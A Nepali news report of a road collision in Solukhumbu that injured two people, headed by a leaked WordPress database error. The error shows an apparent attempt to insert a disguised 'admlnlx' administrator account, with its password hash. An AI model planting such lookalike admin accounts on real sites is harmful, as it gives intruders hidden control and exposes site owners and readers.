WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYnW3UL4FPQMY./p8vNWpdYk9/Zk750', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 05:38:11', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सोलुखुम्बुको सल्लेरी नेले सडक खण्ड अन्र्तगत नाजिङमा बोलेरो र मोटरसाइकल एकआपसमा ठोकिदा २ जना घाइते भएका छन । सोलु दुधकुण्ड नगरपालिका वडा नम्बर –७ नाजिङमा आज पश्चिमबाट पुर्व तर्फ आउदै गरेको स १ ज ४५० नम्बरको बोलेरो र बिपरित दिशाबाट आउदै गरेको बा ६७ प १३०७ नम्बरको मोटरसाइकल एक आपसमा ठोकिदा २ जना घाइते भएको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जनाएको छ
मोटरसाइकल चालक सोलु दुधकुण्ड नगरपालिका ७ का ३२ वर्षीय केशब खत्री र मोटरसाइकलको पछाडी सवार ६८ वर्षीय रत्न बहादुर कार्की घाइते भएको प्रहरीले जनाएको छ । घटना लगतै बोलेरो र चालक थुलुङ दुधकोशी गाउँपालिकाका २५ वर्षीय कुमार बिश्वकर्मालाई नियन्त्रणमा लिएको डिएसपी कबित कटवालले जानकारी दिए। घाइते मध्ये ६८ वर्षीय रत्न बहादुरालाई थप उपचारका लागी काठमाडौ पठाएको छ भने मोटरसाइकल चालकको जिल्ला अस्पताल फाप्लुमा उपचार भइरहेको छ ।